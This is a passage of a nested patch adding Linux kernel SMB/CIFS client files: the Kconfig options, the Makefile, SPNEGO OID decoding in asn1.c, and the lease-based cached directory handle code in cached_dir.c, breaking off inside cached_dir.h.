++obj-$(CONFIG_CIFS)		+= client/
++obj-$(CONFIG_SMB_SERVER)	+= server/
+diff --git a/fs/smb/client/Kconfig b/fs/smb/client/Kconfig
+new file mode 100644
+index 0000000000000..3b7e3b9e4fd2e
+--- /dev/null
++++ b/fs/smb/client/Kconfig
+@@ -0,0 +1,203 @@
++# SPDX-License-Identifier: GPL-2.0-only
++config CIFS
++	tristate "SMB3 and CIFS support (advanced network filesystem)"
++	depends on INET
++	select NLS
++	select CRYPTO
++	select CRYPTO_MD5
++	select CRYPTO_SHA256
++	select CRYPTO_SHA512
++	select CRYPTO_CMAC
++	select CRYPTO_HMAC
++	select CRYPTO_AEAD2
++	select CRYPTO_CCM
++	select CRYPTO_GCM
++	select CRYPTO_ECB
++	select CRYPTO_AES
++	select KEYS
++	select DNS_RESOLVER
++	select ASN1
++	select OID_REGISTRY
++	help
++	  This is the client VFS module for the SMB3 family of NAS protocols,
++	  (including support for the most recent, most secure dialect SMB3.1.1)
++	  as well as for earlier dialects such as SMB2.1, SMB2 and the older
++	  Common Internet File System (CIFS) protocol.  CIFS was the successor
++	  to the original dialect, the Server Message Block (SMB) protocol, the
++	  native file sharing mechanism for most early PC operating systems.
++
++	  The SMB3 protocol is supported by most modern operating systems
++	  and NAS appliances (e.g. Samba, Windows 10, Windows Server 2016,
++	  MacOS) and even in the cloud (e.g. Microsoft Azure).
++	  The older CIFS protocol was included in Windows NT4, 2000 and XP (and
++	  later) as well by Samba (which provides excellent CIFS and SMB3
++	  server support for Linux and many other operating systems). Use of
++	  dialects older than SMB2.1 is often discouraged on public networks.
++	  This module also provides limited support for OS/2 and Windows ME
++	  and similar very old servers.
++
++	  This module provides an advanced network file system client
++	  for mounting to SMB3 (and CIFS) compliant servers.  It includes
++	  support for DFS (hierarchical name space), secure per-user
++	  session establishment via Kerberos or NTLM or NTLMv2, RDMA
++	  (smbdirect), advanced security features, per-share encryption,
++	  directory leases, safe distributed caching (oplock), optional packet
++	  signing, Unicode and other internationalization improvements.
++
++	  In general, the default dialects, SMB3 and later, enable better
++	  performance, security and features, than would be possible with CIFS.
++	  Note that when mounting to Samba, due to the CIFS POSIX extensions,
++	  CIFS mounts can provide slightly better POSIX compatibility
++	  than SMB3 mounts. SMB2/SMB3 mount options are also
++	  slightly simpler (compared to CIFS) due to protocol improvements.
++
++	  If you need to mount to Samba, Azure, Macs or Windows from this machine, say Y.
++
++config CIFS_STATS2
++	bool "Extended statistics"
++	depends on CIFS
++	default y
++	help
++	  Enabling this option will allow more detailed statistics on SMB
++	  request timing to be displayed in /proc/fs/cifs/DebugData and also
++	  allow optional logging of slow responses to dmesg (depending on the
++	  value of /proc/fs/cifs/cifsFYI). See Documentation/admin-guide/cifs/usage.rst
++	  for more details. These additional statistics may have a minor effect
++	  on performance and memory utilization.
++
++	  If unsure, say Y.
++
++config CIFS_ALLOW_INSECURE_LEGACY
++	bool "Support legacy servers which use less secure dialects"
++	depends on CIFS
++	default y
++	help
++	  Modern dialects, SMB2.1 and later (including SMB3 and 3.1.1), have
++	  additional security features, including protection against
++	  man-in-the-middle attacks and stronger crypto hashes, so the use
++	  of legacy dialects (SMB1/CIFS and SMB2.0) is discouraged.
++
++	  Disabling this option prevents users from using vers=1.0 or vers=2.0
++	  on mounts with cifs.ko
++
++	  If unsure, say Y.
++
++config CIFS_UPCALL
++	bool "Kerberos/SPNEGO advanced session setup"
++	depends on CIFS
++	help
++	  Enables an upcall mechanism for CIFS which accesses userspace helper
++	  utilities to provide SPNEGO packaged (RFC 4178) Kerberos tickets
++	  which are needed to mount to certain secure servers (for which more
++	  secure Kerberos authentication is required). If unsure, say Y.
++
++config CIFS_XATTR
++	bool "CIFS extended attributes"
++	depends on CIFS
++	help
++	  Extended attributes are name:value pairs associated with inodes by
++	  the kernel or by users (see the attr(5) manual page for details).
++	  CIFS maps the name of extended attributes beginning with the user
++	  namespace prefix to SMB/CIFS EAs.  EAs are stored on Windows
++	  servers without the user namespace prefix, but their names are
++	  seen by Linux cifs clients prefaced by the user namespace prefix.
++	  The system namespace (used by some filesystems to store ACLs) is
++	  not supported at this time.
++
++	  If unsure, say Y.
++
++config CIFS_POSIX
++	bool "CIFS POSIX Extensions"
++	depends on CIFS && CIFS_ALLOW_INSECURE_LEGACY && CIFS_XATTR
++	help
++	  Enabling this option will cause the cifs client to attempt to
++	  negotiate a newer dialect with servers, such as Samba 3.0.5
++	  or later, that optionally can handle more POSIX like (rather
++	  than Windows like) file behavior.  It also enables
++	  support for POSIX ACLs (getfacl and setfacl) to servers
++	  (such as Samba 3.10 and later) which can negotiate
++	  CIFS POSIX ACL support.  If unsure, say N.
++
++config CIFS_DEBUG
++	bool "Enable CIFS debugging routines"
++	default y
++	depends on CIFS
++	help
++	  Enabling this option adds helpful debugging messages to
++	  the cifs code which increases the size of the cifs module.
++	  If unsure, say Y.
++
++config CIFS_DEBUG2
++	bool "Enable additional CIFS debugging routines"
++	depends on CIFS_DEBUG
++	help
++	  Enabling this option adds a few more debugging routines
++	  to the cifs code which slightly increases the size of
++	  the cifs module and can cause additional logging of debug
++	  messages in some error paths, slowing performance. This
++	  option can be turned off unless you are debugging
++	  cifs problems.  If unsure, say N.
++
++config CIFS_DEBUG_DUMP_KEYS
++	bool "Dump encryption keys for offline decryption (Unsafe)"
++	depends on CIFS_DEBUG
++	help
++	  Enabling this will dump the encryption and decryption keys
++	  used to communicate on an encrypted share connection on the
++	  console. This allows Wireshark to decrypt and dissect
++	  encrypted network captures. Enable this carefully.
++	  If unsure, say N.
++
++config CIFS_DFS_UPCALL
++	bool "DFS feature support"
++	depends on CIFS
++	help
++	  Distributed File System (DFS) support is used to access shares
++	  transparently in an enterprise name space, even if the share
++	  moves to a different server.  This feature also enables
++	  an upcall mechanism for CIFS which contacts userspace helper
++	  utilities to provide server name resolution (host names to
++	  IP addresses) which is needed in order to reconnect to
++	  servers if their addresses change or for implicit mounts of
++	  DFS junction points. If unsure, say Y.
++
++config CIFS_SWN_UPCALL
++	bool "SWN feature support"
++	depends on CIFS
++	help
++	  The Service Witness Protocol (SWN) is used to get notifications
++	  from a highly available server of resource state changes. This
++	  feature enables an upcall mechanism for CIFS which contacts a
++	  userspace daemon to establish the DCE/RPC connection to retrieve
++	  the cluster available interfaces and resource change notifications.
++	  If unsure, say Y.
++
++config CIFS_NFSD_EXPORT
++	bool "Allow nfsd to export CIFS file system"
++	depends on CIFS && BROKEN
++	help
++	  Allows NFS server to export a CIFS mounted share (nfsd over cifs)
++
++config CIFS_SMB_DIRECT
++	bool "SMB Direct support"
++	depends on CIFS=m && INFINIBAND && INFINIBAND_ADDR_TRANS || CIFS=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
++	help
++	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
++	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
++	  say Y.
++
++config CIFS_FSCACHE
++	bool "Provide CIFS client caching support"
++	depends on CIFS=m && FSCACHE || CIFS=y && FSCACHE=y
++	help
++	  Makes CIFS FS-Cache capable. Say Y here if you want your CIFS data
++	  to be cached locally on disk through the general filesystem cache
++	  manager. If unsure, say N.
++
++config CIFS_ROOT
++	bool "SMB root file system (Experimental)"
++	depends on CIFS=y && IP_PNP
++	help
++	  Enables root file system support over SMB protocol.
++
++	  Most people say N here.
+diff --git a/fs/smb/client/Makefile b/fs/smb/client/Makefile
+new file mode 100644
+index 0000000000000..7c9785973f496
+--- /dev/null
++++ b/fs/smb/client/Makefile
+@@ -0,0 +1,34 @@
++# SPDX-License-Identifier: GPL-2.0
++#
++# Makefile for Linux CIFS/SMB2/SMB3 VFS client
++#
++ccflags-y += -I$(src)		# needed for trace events
++obj-$(CONFIG_CIFS) += cifs.o
++
++cifs-y := trace.o cifsfs.o cifs_debug.o connect.o dir.o file.o \
++	  inode.o link.o misc.o netmisc.o smbencrypt.o transport.o \
++	  cached_dir.o cifs_unicode.o nterr.o cifsencrypt.o \
++	  readdir.o ioctl.o sess.o export.o unc.o winucase.o \
++	  smb2ops.o smb2maperror.o smb2transport.o \
++	  smb2misc.o smb2pdu.o smb2inode.o smb2file.o cifsacl.o fs_context.o \
++	  dns_resolve.o cifs_spnego_negtokeninit.asn1.o asn1.o
++
++$(obj)/asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.h
++
++$(obj)/cifs_spnego_negtokeninit.asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.c $(obj)/cifs_spnego_negtokeninit.asn1.h
++
++cifs-$(CONFIG_CIFS_XATTR) += xattr.o
++
++cifs-$(CONFIG_CIFS_UPCALL) += cifs_spnego.o
++
++cifs-$(CONFIG_CIFS_DFS_UPCALL) += cifs_dfs_ref.o dfs_cache.o
++
++cifs-$(CONFIG_CIFS_SWN_UPCALL) += netlink.o cifs_swn.o
++
++cifs-$(CONFIG_CIFS_FSCACHE) += fscache.o
++
++cifs-$(CONFIG_CIFS_SMB_DIRECT) += smbdirect.o
++
++cifs-$(CONFIG_CIFS_ROOT) += cifsroot.o
++
++cifs-$(CONFIG_CIFS_ALLOW_INSECURE_LEGACY) += smb1ops.o cifssmb.o
+diff --git a/fs/smb/client/asn1.c b/fs/smb/client/asn1.c
+new file mode 100644
+index 0000000000000..b5724ef9f182f
+--- /dev/null
++++ b/fs/smb/client/asn1.c
+@@ -0,0 +1,63 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/oid_registry.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "cifs_spnego_negtokeninit.asn1.h"
++
++int
++decode_negTokenInit(unsigned char *security_blob, int length,
++		    struct TCP_Server_Info *server)
++{
++	if (asn1_ber_decoder(&cifs_spnego_negtokeninit_decoder, server,
++			     security_blob, length) == 0)
++		return 1;
++	else
++		return 0;
++}
++
++int cifs_gssapi_this_mech(void *context, size_t hdrlen,
++			  unsigned char tag, const void *value, size_t vlen)
++{
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid != OID_spnego) {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		cifs_dbg(FYI, "Error decoding negTokenInit header: unexpected OID %s\n",
++			 buf);
++		return -EBADMSG;
++	}
++	return 0;
++}
++
++int cifs_neg_token_init_mech_type(void *context, size_t hdrlen,
++				  unsigned char tag,
++				  const void *value, size_t vlen)
++{
++	struct TCP_Server_Info *server = context;
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid == OID_mskrb5)
++		server->sec_mskerberos = true;
++	else if (oid == OID_krb5u2u)
++		server->sec_kerberosu2u = true;
++	else if (oid == OID_krb5)
++		server->sec_kerberos = true;
++	else if (oid == OID_ntlmssp)
++		server->sec_ntlmssp = true;
++	else {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		cifs_dbg(FYI, "Decoding negTokenInit: unsupported OID %s\n",
++			 buf);
++	}
++	return 0;
++}
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+new file mode 100644
+index 0000000000000..bfc964b36c72e
+--- /dev/null
++++ b/fs/smb/client/cached_dir.c
+@@ -0,0 +1,606 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *  Functions to handle the cached directory entries
++ *
++ *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
++ */
++
++#include <linux/namei.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smb2proto.h"
++#include "cached_dir.h"
++
++static struct cached_fid *init_cached_dir(const char *path);
++static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
++
++static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
++						    const char *path,
++						    bool lookup_only)
++{
++	struct cached_fid *cfid;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
++		if (!strcmp(cfid->path, path)) {
++			/*
++			 * If it doesn't have a lease it is either not yet
++			 * fully cached or it may be in the process of
++			 * being deleted due to a lease break.
++			 */
++			if (!cfid->has_lease) {
++				spin_unlock(&cfids->cfid_list_lock);
++				return NULL;
++			}
++			kref_get(&cfid->refcount);
++			spin_unlock(&cfids->cfid_list_lock);
++			return cfid;
++		}
++	}
++	if (lookup_only) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	if (cfids->num_entries >= MAX_CACHED_FIDS) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	cfid = init_cached_dir(path);
++	if (cfid == NULL) {
++		spin_unlock(&cfids->cfid_list_lock);
++		return NULL;
++	}
++	cfid->cfids = cfids;
++	cfids->num_entries++;
++	list_add(&cfid->entry, &cfids->entries);
++	cfid->on_list = true;
++	kref_get(&cfid->refcount);
++	spin_unlock(&cfids->cfid_list_lock);
++	return cfid;
++}
++
++static struct dentry *
++path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
++{
++	struct dentry *dentry;
++	const char *s, *p;
++	char sep;
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	dentry = dget(cifs_sb->root);
++	s = path;
++
++	do {
++		struct inode *dir = d_inode(dentry);
++		struct dentry *child;
++
++		if (!S_ISDIR(dir->i_mode)) {
++			dput(dentry);
++			dentry = ERR_PTR(-ENOTDIR);
++			break;
++		}
++
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		p = s++;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++
++		child = lookup_positive_unlocked(p, dentry, s - p);
++		dput(dentry);
++		dentry = child;
++	} while (!IS_ERR(dentry));
++	return dentry;
++}
++
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
++/*
++ * Open the and cache a directory handle.
++ * If error then *cfid is not initialized.
++ */
++int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
++		    const char *path,
++		    struct cifs_sb_info *cifs_sb,
++		    bool lookup_only, struct cached_fid **ret_cfid)
++{
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct cifs_open_parms oparms;
++	struct smb2_create_rsp *o_rsp = NULL;
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	int resp_buftype[2];
++	struct smb_rqst rqst[2];
++	struct kvec rsp_iov[2];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	int rc, flags = 0;
++	__le16 *utf16_path = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_II;
++	struct cifs_fid *pfid;
++	struct dentry *dentry = NULL;
++	struct cached_fid *cfid;
++	struct cached_fids *cfids;
++	const char *npath;
++
++	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
++	    is_smb1_server(tcon->ses->server))
++		return -EOPNOTSUPP;
++
++	ses = tcon->ses;
++	server = ses->server;
++	cfids = tcon->cfids;
++
++	if (!server->ops->new_lease_key)
++		return -EIO;
++
++	if (cifs_sb->root == NULL)
++		return -ENOENT;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	cfid = find_or_create_cached_dir(cfids, path, lookup_only);
++	if (cfid == NULL) {
++		kfree(utf16_path);
++		return -ENOENT;
++	}
++	/*
++	 * At this point we either already have a lease and can just
++	 * return it, or we are guaranteed to be the only thread accessing
++	 * this cfid.
++	 */
++	if (cfid->has_lease) {
++		*ret_cfid = cfid;
++		kfree(utf16_path);
++		return 0;
++	}
++
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send compounded request and then potentially
++	 * having a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
++	/*
++	 * We do not hold the lock during the open, in case
++	 * SMB2_open needs to reconnect.
++	 * This is safe because no other thread will be able to get a ref
++	 * to the cfid until we have finished opening the file and (possibly)
++	 * acquired a lease.
++	 */
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	pfid = &cfid->fid;
++	server->ops->new_lease_key(pfid);
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto oshr_free;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	memset(&qi_iov, 0, sizeof(qi_iov));
++	rqst[1].rq_iov = qi_iov;
++	rqst[1].rq_nvec = 1;
++
++	rc = SMB2_query_info_init(tcon, server,
++				  &rqst[1], COMPOUND_FID,
++				  COMPOUND_FID, FILE_ALL_INFORMATION,
++				  SMB2_O_INFO_FILE, 0,
++				  sizeof(struct smb2_file_all_info) +
++				  PATH_MAX * 2, 0, NULL);
++	if (rc)
++		goto oshr_free;
++
++	smb2_set_related(&rqst[1]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 2, rqst,
++				resp_buftype, rsp_iov);
++	if (rc) {
++		if (rc == -EREMCHG) {
++			tcon->need_reconnect = true;
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++		}
++		goto oshr_free;
++	}
++	cfid->tcon = tcon;
++	cfid->is_open = true;
++
++	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
++	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
++	oparms.fid->volatile_fid = o_rsp->VolatileFileId;
++#ifdef CONFIG_CIFS_DEBUG2
++	oparms.fid->mid = le64_to_cpu(o_rsp->hdr.MessageId);
++#endif /* CIFS_DEBUG2 */
++
++	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
++		goto oshr_free;
++
++	smb2_parse_contexts(server, o_rsp,
++			    &oparms.fid->epoch,
++			    oparms.fid->lease_key, &oplock,
++			    NULL, NULL);
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
++	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
++		goto oshr_free;
++	if (!smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				sizeof(struct smb2_file_all_info),
++				&rsp_iov[1], sizeof(struct smb2_file_all_info),
++				(char *)&cfid->file_all_info))
++		cfid->file_all_info_is_valid = true;
++
++	if (!npath[0])
++		dentry = dget(cifs_sb->root);
++	else {
++		dentry = path_to_dentry(cifs_sb, npath);
++		if (IS_ERR(dentry)) {
++			rc = -ENOENT;
++			goto oshr_free;
++		}
++	}
++	cfid->dentry = dentry;
++	cfid->time = jiffies;
++	cfid->has_lease = true;
++
++oshr_free:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_info_free(&rqst[1]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	spin_lock(&cfids->cfid_list_lock);
++	if (rc && !cfid->has_lease) {
++		if (cfid->on_list) {
++			list_del(&cfid->entry);
++			cfid->on_list = false;
++			cfids->num_entries--;
++		}
++		rc = -ENOENT;
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++		 * Release the Lease-ref so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
++		free_cached_dir(cfid);
++		cfid = NULL;
++	}
++
++	if (rc == 0) {
++		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
++
++	return rc;
++}
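++
++/*
++ * Typical caller pattern (sketch; error handling elided):
++ *
++ *	struct cached_fid *cfid;
++ *
++ *	rc = open_cached_dir(xid, tcon, path, cifs_sb, false, &cfid);
++ *	if (rc == 0) {
++ *		... use cfid->fid in compounded requests ...
++ *		close_cached_dir(cfid);
++ *	}
++ *
++ * On success the caller owns one reference; close_cached_dir() drops it.
++ */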
++
++int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
++			      struct dentry *dentry,
++			      struct cached_fid **ret_cfid)
++{
++	struct cached_fid *cfid;
++	struct cached_fids *cfids = tcon->cfids;
++
++	if (cfids == NULL)
++		return -ENOENT;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
++		if (dentry && cfid->dentry == dentry) {
++			cifs_dbg(FYI, "found a cached root file handle by dentry\n");
++			kref_get(&cfid->refcount);
++			*ret_cfid = cfid;
++			spin_unlock(&cfids->cfid_list_lock);
++			return 0;
++		}
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	return -ENOENT;
++}
++
++static void
++smb2_close_cached_fid(struct kref *ref)
++{
++	struct cached_fid *cfid = container_of(ref, struct cached_fid,
++					       refcount);
++
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	if (cfid->on_list) {
++		list_del(&cfid->entry);
++		cfid->on_list = false;
++		cfid->cfids->num_entries--;
++	}
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++
++	dput(cfid->dentry);
++	cfid->dentry = NULL;
++
++	if (cfid->is_open) {
++		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
++	}
++
++	free_cached_dir(cfid);
++}
++
++void drop_cached_dir_by_name(const unsigned int xid, struct cifs_tcon *tcon,
++			     const char *name, struct cifs_sb_info *cifs_sb)
++{
++	struct cached_fid *cfid = NULL;
++	int rc;
++
++	rc = open_cached_dir(xid, tcon, name, cifs_sb, true, &cfid);
++	if (rc) {
++		cifs_dbg(FYI, "no cached dir found for rmdir(%s)\n", name);
++		return;
++	}
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	if (cfid->has_lease) {
++		cfid->has_lease = false;
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++	close_cached_dir(cfid);
++}
++
++void close_cached_dir(struct cached_fid *cfid)
++{
++	kref_put(&cfid->refcount, smb2_close_cached_fid);
++}
++
++/*
++ * Called from cifs_kill_sb when we unmount a share
++ */
++void close_all_cached_dirs(struct cifs_sb_info *cifs_sb)
++{
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct cached_fid *cfid;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cached_fids *cfids;
++
++	for (node = rb_first(root); node; node = rb_next(node)) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++		tcon = tlink_tcon(tlink);
++		if (IS_ERR(tcon))
++			continue;
++		cfids = tcon->cfids;
++		if (cfids == NULL)
++			continue;
++		list_for_each_entry(cfid, &cfids->entries, entry) {
++			dput(cfid->dentry);
++			cfid->dentry = NULL;
++		}
++	}
++}
++
++/*
++ * Invalidate all cached dirs when a TCON has been reset
++ * due to a session loss.
++ */
++void invalidate_all_cached_dirs(struct cifs_tcon *tcon)
++{
++	struct cached_fids *cfids = tcon->cfids;
++	struct cached_fid *cfid, *q;
++	LIST_HEAD(entry);
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
++		list_move(&cfid->entry, &entry);
++		cfids->num_entries--;
++		cfid->is_open = false;
++		cfid->on_list = false;
++		/* To prevent race with smb2_cached_lease_break() */
++		kref_get(&cfid->refcount);
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++
++	list_for_each_entry_safe(cfid, q, &entry, entry) {
++		list_del(&cfid->entry);
++		cancel_work_sync(&cfid->lease_break);
++		if (cfid->has_lease) {
++			/*
++			 * The lease was never cancelled by the server, so we
++			 * need to drop the reference.
++			 */
++			spin_lock(&cfids->cfid_list_lock);
++			cfid->has_lease = false;
++			spin_unlock(&cfids->cfid_list_lock);
++			kref_put(&cfid->refcount, smb2_close_cached_fid);
++		}
++		/* Drop the extra reference taken above */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++}
++
++static void
++smb2_cached_lease_break(struct work_struct *work)
++{
++	struct cached_fid *cfid = container_of(work,
++				struct cached_fid, lease_break);
++
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	cfid->has_lease = false;
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++	kref_put(&cfid->refcount, smb2_close_cached_fid);
++}
++
++int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16])
++{
++	struct cached_fids *cfids = tcon->cfids;
++	struct cached_fid *cfid;
++
++	if (cfids == NULL)
++		return false;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
++		if (cfid->has_lease &&
++		    !memcmp(lease_key,
++			    cfid->fid.lease_key,
++			    SMB2_LEASE_KEY_SIZE)) {
++			cfid->time = 0;
++			/*
++			 * We found a lease; remove it from the list
++			 * so that no other threads can access it.
++			 */
++			list_del(&cfid->entry);
++			cfid->on_list = false;
++			cfids->num_entries--;
++
++			queue_work(cifsiod_wq,
++				   &cfid->lease_break);
++			spin_unlock(&cfids->cfid_list_lock);
++			return true;
++		}
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	return false;
++}
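++
++/*
++ * Lease-break flow (sketch): on a matching lease key the cfid is
++ * unlinked from the list above, then smb2_cached_lease_break() runs from
++ * the workqueue, clears has_lease and drops the lease reference, which
++ * in turn closes the handle via smb2_close_cached_fid().
++ */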
++
++static struct cached_fid *init_cached_dir(const char *path)
++{
++	struct cached_fid *cfid;
++
++	cfid = kzalloc(sizeof(*cfid), GFP_ATOMIC);
++	if (!cfid)
++		return NULL;
++	cfid->path = kstrdup(path, GFP_ATOMIC);
++	if (!cfid->path) {
++		kfree(cfid);
++		return NULL;
++	}
++
++	INIT_WORK(&cfid->lease_break, smb2_cached_lease_break);
++	INIT_LIST_HEAD(&cfid->entry);
++	INIT_LIST_HEAD(&cfid->dirents.entries);
++	mutex_init(&cfid->dirents.de_mutex);
++	spin_lock_init(&cfid->fid_lock);
++	kref_init(&cfid->refcount);
++	return cfid;
++}
++
++static void free_cached_dir(struct cached_fid *cfid)
++{
++	struct cached_dirent *dirent, *q;
++
++	dput(cfid->dentry);
++	cfid->dentry = NULL;
++
++	/*
++	 * Delete all cached dirent names
++	 */
++	list_for_each_entry_safe(dirent, q, &cfid->dirents.entries, entry) {
++		list_del(&dirent->entry);
++		kfree(dirent->name);
++		kfree(dirent);
++	}
++
++	kfree(cfid->path);
++	cfid->path = NULL;
++	kfree(cfid);
++}
++
++struct cached_fids *init_cached_dirs(void)
++{
++	struct cached_fids *cfids;
++
++	cfids = kzalloc(sizeof(*cfids), GFP_KERNEL);
++	if (!cfids)
++		return NULL;
++	spin_lock_init(&cfids->cfid_list_lock);
++	INIT_LIST_HEAD(&cfids->entries);
++	return cfids;
++}
++
++/*
++ * Called from tconInfoFree when we are tearing down the tcon.
++ * There are no active users or open files/directories at this point.
++ */
++void free_cached_dirs(struct cached_fids *cfids)
++{
++	struct cached_fid *cfid, *q;
++	LIST_HEAD(entry);
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
++		cfid->on_list = false;
++		cfid->is_open = false;
++		list_move(&cfid->entry, &entry);
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++
++	list_for_each_entry_safe(cfid, q, &entry, entry) {
++		list_del(&cfid->entry);
++		free_cached_dir(cfid);
++	}
++
++	kfree(cfids);
++}
+diff --git a/fs/smb/client/cached_dir.h b/fs/smb/client/cached_dir.h
+new file mode 100644
+index 0000000000000..2f4e764c9ca9a
+--- /dev/null
++++ b/fs/smb/client/cached_dir.h
+@@ -0,0 +1,80 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ *  Functions to handle the cached directory entries
++ *
++ *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
++ */
++
++#ifndef _CACHED_DIR_H
++#define _CACHED_DIR_H
++
++
++struct cached_dirent {
++	struct list_head entry;
++	char *name;
++	int namelen;
++	loff_t pos;
++
++	struct cifs_fattr fattr;
++};
++
++struct cached_dirents {
++	bool is_valid:1;
++	bool is_failed:1;
++	struct dir_context *ctx; /*
++				  * Only used to make sure we only take entries
